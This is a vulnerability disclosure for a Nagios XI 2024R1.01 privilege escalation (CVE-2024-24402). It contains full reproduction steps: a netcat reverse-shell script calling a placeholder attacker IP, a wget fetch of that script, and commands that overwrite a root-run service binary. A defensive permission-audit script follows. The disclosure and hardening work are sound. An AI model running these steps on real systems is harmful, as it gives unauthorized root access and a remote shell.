Priv esc in Nagios 2024R1.01

# Vulnerability Report
CVE Discovered by: Jarod Jaslow (MAWK)
## Vulnerability Details:
- **Endpoint:** Nagios XI Version 2024R1.01
- **Vulnerability Type:** Privilege Escalation from User "NAGIOS"
- **Exploitation Result:** Full root access on the target system
## Steps to Reproduce:
### 1. Create a Fresh Instance of Nagios XI Version 2024R1.01:
- Download the Nagios XI OVA file from: [https://assets.nagios.com/downloads/nagiosxi/2024/ovf/nagiosxi-2024R1.0.1-64.ova](https://assets.nagios.com/downloads/nagiosxi/2024/ovf/nagiosxi-2024R1.0.1-64.ova)
- Deploy the OVA to create a fresh instance.
- Using my previous report, gain RCE on the server.
### 2. Abuse Privilege Escalation:
- As the user "NAGIOS," create a file on the attacker machine with the following content:
```bash
#!/bin/bash
nc -e /bin/bash <Attacker IP> 4445
```

- Host the file on the attacker machine via a Python HTTP server:
```bash
python3 -m http.server 8000
```

- Start a Netcat (NC) listening server on the attacker machine:
```bash
nc -nlvp 4445
```

### 3. Execute the Exploitation on the Victim Computer:
- Fetch the file from the attacker machine:
```bash
wget http://<Attacker IP>:8000/npcd
```

- Execute the following commands to escalate privileges and receive a connection as root:
```bash
sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
cp npcd /usr/local/nagios/bin/npcd
sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd
```


## Recommendation:
It is recommended to restrict the ability of the user "NAGIOS" to write to Nagios service executables that are run as root. This can be achieved by implementing stricter file permissions and access controls for the relevant directories and files associated with Nagios services.
This should be fixed in new releases.
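
One way to check for the condition the recommendation describes, as an added example that is not part of the original report or of Nagios XI: the script flags a service binary when the file or its containing directory is not owned by root or is group- or other-writable. The function names and the `TRUSTED_UID` variable are assumptions of this example.

```bash
#!/bin/bash
# Added example: audit whether a binary started by a root-run service script
# can be replaced by a non-root account. Names here are hypothetical.

# UID allowed to own service binaries: root by default (overridable for testing).
TRUSTED_UID="${TRUSTED_UID:-0}"

# Print the path if it is not owned by TRUSTED_UID or is group/other-writable.
# Any group write bit is flagged (conservative); symlinks are flagged as well,
# because find reports the link's own mode. -prune stops descent into directories.
unsafe_entry() {
    find "$1" -prune \( ! -user "$TRUSTED_UID" -o -perm -020 -o -perm -002 \) \
        -print 2>/dev/null
}

# A binary can be swapped by writing to the file itself or by creating/renaming
# entries in its directory, so both are checked (ancestor directories are not).
# Returns 0 when locked down, 1 when replaceable, 2 when the path is missing.
audit_binary() {
    local bin="$1" findings
    if [ ! -e "$bin" ]; then
        echo "MISSING      $bin"
        return 2
    fi
    findings="$(unsafe_entry "$bin"; unsafe_entry "$(dirname "$bin")")"
    if [ -n "$findings" ]; then
        printf '%s\n' "$findings" | while IFS= read -r entry; do
            echo "REPLACEABLE  $bin via $entry"
        done
        return 1
    fi
    echo "OK           $bin"
    return 0
}

# Audit every path given on the command line and report if any check fails.
status=0
for target in "$@"; do
    audit_binary "$target" || status=1
done
[ "$status" -eq 0 ] || echo "audit failed: make root the owner and remove group/other write" >&2
```

Run it on the Nagios XI host with the service binary from the steps above, `/usr/local/nagios/bin/npcd`, as the argument.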
CVE:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-24402